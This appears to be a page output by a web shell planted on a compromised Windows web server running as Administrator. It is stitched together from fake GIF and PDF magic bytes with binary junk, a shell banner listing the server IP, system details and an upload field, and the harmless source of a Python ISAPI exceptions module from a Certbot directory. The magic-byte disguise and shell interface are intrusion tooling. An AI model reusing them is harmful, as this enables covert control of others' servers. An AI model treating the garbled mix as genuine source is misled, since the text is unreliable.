GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Program Files (x86)/Certbot/pkgs/isapi/ |
Upload File : |
# The Python ISAPI package. # Exceptions thrown by the DLL framework. class ISAPIError(Exception): def __init__(self, errno, strerror = None, funcname = None): # named attributes match IOError etc. self.errno = errno self.strerror = strerror self.funcname = funcname Exception.__init__(self, errno, strerror, funcname) def __str__(self): if self.strerror is None: try: import win32api self.strerror = win32api.FormatMessage(self.errno).strip() except: self.strerror = "no error message is available" # str() looks like a win32api error. return str( (self.errno, self.strerror, self.funcname) ) class FilterError(ISAPIError): pass class ExtensionError(ISAPIError): pass # A little development aid - a filter or extension callback function can # raise one of these exceptions, and the handler module will be reloaded. # This means you can change your code without restarting IIS. # After a reload, your filter/extension will have the GetFilterVersion/ # GetExtensionVersion function called, but with None as the first arg. class InternalReloadException(Exception): pass